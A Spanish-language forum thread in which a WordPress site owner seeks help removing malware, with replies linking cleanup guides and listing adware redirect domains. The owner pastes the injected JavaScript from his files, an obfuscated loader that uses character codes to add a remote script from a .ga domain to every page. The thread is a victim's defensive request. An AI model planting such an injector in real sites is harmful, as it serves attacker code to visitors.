Soporte y Tecnología > Diseño & Webmaster Corner

Ayuda con sitio web infectado

(1/2) > >>

GUANAQUISIMO:
Buenas tardes senores, como estan?

Les solicito ayuda a los duros en wordpress

mi sitio web salio infectado con unas vainas que en https://securityscan.getastra.com/malware-scanner?site=https%3A%2F%2Fsisdeagro.comme da la siguiente informacion


Suspicious:JS/hexlikeunknown detected in http://main.travelfornamewalking.ga/det.php?sit=flex&sid=3&yuid=1&/wp-includes/js/jquery/jquery_js&ver=1.12.4-wp at line 2

Yo deseo saber en qué archivo esta la infeccion,

alguien me ayude por favor

muchas gracias,
saludos!

xcero:
Saludos

Hay una guia  para específicamente los ataques del tipo 
--- Código: ---https://js.xxxxxxxxxx.ga/stat.js?n=ns1\' type
--- Fin del código ---

Lo que hacen hincapié , es que tomes tu taza de café y hagas tu backup por que debes de eliminar algunos archivos de tu capeta publica (public_html)  , es decir detenidamente y de manera calmada

https://txnkaro.com/blog/how-to-clean-js-donatelloflowfirstly-ga-virus-from-wordpress-site/


Igual wordpress tiene su guia

https://wordpress.org/support/article/faq-my-site-was-hacked/

xcero:
A mi me detecta el Clas/Adware
 https://callhimnamerstone.ga/
https://bitterblackwatter.ga

Cualquier hyperlink  en el sitio sisdeagro.com se dirige a Adware

GUANAQUISIMO:
Buenas noches senores,


Fijense que el tutorial que me envio xcero me sirvio pero ahora el codigo malicioso no es el mismo sino que esta codificado en ASCII



--- Código: ---Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);
--- Fin del código ---

Y resulta que todos los archivos .js o .json estan infectados (todos aparecen con permisos 777 tambien) los estoy removiendo manualmente (el código) pero son bastantes creo que mas de 200, la cosa es que tambien he seguido las sugerencias de la guia y espero poder removerlo, si puedo les cuento.  :yao_ming: :yao_ming: :yao_ming:

Muchas gracias!

GUANAQUISIMO:
Aunque como puedo sustituir un texto en todos los archivos de una carpeta por ejemplo en wordpress? alguien me puede sugerir?

muchas gracias!

Navegación

[0] Índice de Mensajes

[#] Página Siguiente

Ir a la versión completa